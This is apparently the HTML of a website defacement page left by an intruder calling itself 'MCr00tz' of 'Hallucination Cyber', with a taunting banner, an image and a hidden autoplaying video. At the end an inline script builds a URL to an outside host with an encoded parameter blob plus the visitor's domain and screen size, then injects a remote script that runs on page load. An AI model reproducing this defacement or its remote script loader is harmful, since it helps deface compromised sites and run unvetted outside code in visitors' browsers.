
<title>Got Hacked??</title>
<body bgcolor = black>
<center> <h1> <font color= red>Hacked By MCr00tz</font> </h1> </center>
<hr >
<br>
<br>
<center> <h3><font color= green>Hallucination</font> <font color= white>Cyber</font> </h3> </center>
<br>
<center><img src = "https://1.bp.blogspot.com/-tTjLyX9vIj8/Wc8Mm5TSh2I/AAAAAAAAA2k/UowG4m_0Y8odiHakDD6XyLc6DY-cCorJwCPcBGAYYCw/s1600/21100504_1844264082569323_515230680_n.jpg"></center>
<br>
<center><font color = white>Back Again!! </font> </center>
<embed src="http://www.youtube.com/v/GRWbIoIR04c&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mI6NTdZT%2biEXRgk4YVSFlSdcfnBvokn7GJ0pJ2V4KRVyudbYHVezVd78wpAKe0f06wA8ENGX00XnaIrkR7ljZfb96wGFh0nbVR73ekppNy%2fSzBbgbxrPy2pHdzwxmq6fhunQR%2fxXCjhf0TID7gNATXA%2fytv5UHKfg7Zi2yeQDcHH0iFBHqEDeXWfMY9mDSc2fyelO6%2fJMbXwWTpvmQ%2bxB1INzAhmzlyZHmRXphEkAlyErfI2czNnWFt9a23ZN9t%2fEM1K%2bQ8rHr04TzFxUYsQE2D6FJAtrrixhS%2bJuOQFGuaU3z2sVNDajZrlo6KEWdxlyFpMYS7LD9v4rfb0sVL32TOje6DkG9bSGyf5CoZbvyFFrzbnRxuDDdYmTq6ROEyQ6N3%2f8ZX%2bU75BVTSfITeSmAEiuRWzYz%2brlBOZLuT76fanuU5Jegh7XX28zyMQcyHvu2hIxjBDuRXeM7zU7dOx%2bkCvnWov7zBNx" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
